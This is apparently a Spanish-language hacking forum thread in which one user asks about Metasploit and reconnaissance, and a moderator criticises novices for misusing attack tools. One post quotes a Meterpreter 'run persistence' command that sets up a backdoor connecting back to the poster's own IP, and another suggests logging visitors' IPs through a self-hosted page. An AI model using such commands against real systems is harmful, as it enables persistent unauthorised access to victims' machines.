Estimado , creo que tu mas de Ingenieria Inversa, hablas del paso "Information Gathering" que es un paso que entre sus etapas incluye el reconocimiento de hostings vivos, para eso necesitas adquirir conocimientos relativos al manejo de dominios,zonas,etc. Y entre ellos usar comandos como "nslookup", "dig", entre otros.

Saludos, espero haber aportado un poco

Estimado, si es posible adjudicarle una clave al HDD, y es diferente de la Bios

Saludos

Estimado , si quieres acercarte a ello requieres desarrollar habilidades de alto nivel, deberias estudiar muchisimas horas , practicar dia a dia, las distintas areas del conocimiento:

-servicios mas utilizados (smtp,ftp,http,pop, ssh,etc)
-lenguajes de programacion (en nivel experto )
-como funciona el internet (en general)
-redes
-protocolos de redes
-encriptacion
-lenguajes de distintos niveles ( bajo nivel  / alto nivel / assambler, etc)
-ingenieria social
-programacion scripting
-sql
-distintos motores de bases de datos, y mucho mas

Finalmente deberias aprender a integrar todos estos conocimientos, lo cual requiere años, espero haber aportado un grano de arena, saludos para todos.

Las paginas web normales o grandes, visualizan la ip de sus visitantes, por lo tanto si tu tuvieras una pagina propia (hosting gratuito) y se la envias podrias recoger la ip de quien visita tu pagina, codificando tu pagina, ya sea en php,asp, etc.

 

Estimado , antiguamente al recibir un correo en hotmail  y viendo el "Source" se podia ver la ip del emisor, pero actualmete se ve la ip del servidor de Hotmail, live, etc

Estimados Moderadores, creo que la apertura de este tema ha sido un fracaso, si quieren pueden borrarlo, ya que lo comenze sin sintetizar el problema en cuestion

Saludos

Te entiendo, solo abrí el post de esa manera para resumir.

He usado los siguientes parámetros:

run persistence -U -i 5 S -p 4444 -r "aca-mi-ip"

Pero solo sirve al conectar la primera vez, luego sin embargo se pierde la persistencia durante otras sesiones por lo que deduzco que podrían estar mal los parametros quizas.

Que otra posibilidad podria ser?

---

Cita de: MoonShadow en 23 Febrero 2014, 19:17
No es que sean los mas efectivos, depende de lo que quieras hacer buscas lo parametros que te convengan



Te entiendo, solo abrí el post de esa manera para resumir.

He usado los siguientes parámetros:

run persistence -U -i 5 S -p 4444 -r "aca-mi-ip"

Pero solo sirve al conectar la primera vez, luego sin embargo se pierde la persistencia durante otras sesiones por lo que deduzco que podrían estar mal los parametros quizas.

Que otra posibilidad podria ser?

---

Cita de: .:UND3R:. en Ayer a las 07:22
Intentaré dar mi punto de vista. Mestasploit Framework es una excelente recopilación de herramientas. Minimiza el proceso de recopilación de información y explotación, sin duda es increíble, no todo es msfconsole, se cuenta con múltiples comandos y utilidades que facilitan el proceso de creación de exploit, pero aquí el problema, su facilidad permite que caiga en manos de niños que no saben lo que están haciendo y peor aun ni lo que están diciendo, por favor si te quieres un poquito y no quieres ridiculizarte simplemente busca en google, nadie nace sabiendo y por eso mismo, pero antes que plantees una duda, debes al menos saber que estás herramienta estás usando, entender más menos su funcionalidad. Es muy cómico ver un sin fin de guías que ya considero graciosas. No es tu culpa pero quizás con este post me desquito con todo lo que he visto, muchas personas publicando tutoriales de como hackear, como hacer virus y un sin fin de cosas, algunos dicen:
"te bajas un programa llamado devc++ y pegas este código" otros como "escribes ifconfig y pegas los numeritos que te muestran el mensaje", es decir solo contaminan, expanden e incentivan ser lammer. Ser hacker es sencillo muy pero muy fácil y te apuesto que TÚ NO PUEDES NI PODRÁS SERLO por una sencilla razón. Un hacker será aquella persona visionaria con interés de aprender, con un espíritu aventuro, y encantado por la curiosidad del por qué de las cosas, ¿muy fácil y sencillo verdad?, pero para otros quizás más fácil es pegar palabras ilógicas en un foro, que peor aun terminan desprestigiando este magnífico foro, digamos que crees que plantear una duda con respecto a una línea de comando es hacking avanzado, entonces para ti que es, solventar una duda con respecto a un funcionamiento interno de una DLL?, una duda sobre una estructura puntual de un determinado lenguaje de programación, dudas con protocolos, fallos de seguridad?  

Como anécdota intenté enseñarle mi vago conocimiento a una persona, y me llevé la más triste impresión, querer hackear juegos, robar dinero y contraseñas, cuando le mostré metasploit fue mi peor error de mi vida (luego de perder mi tiempo respondiendo este mensaje), ahora esa persona se cree hacker   imagínate, por que sabe lo que es un payload y sabe usar el comando use exploit de metasploit cree que lanzar un exploit es algo básico y muy fácil.

Todas estas herramientas están hechas para facilitar el pentesting de gente que entiende lo que está haciendo, así que por favor no juegues con juguetes de grandes que te puedes lastimar.



zZzZZZZz.... tienes bastante tiempo para escribir

[MOD] NO se hace triple post, se usa el botón "modificar", para añadir comentarios.

Alguien conoce los parametros mas efectivos a configurar para este script en msfconsole?

Gracias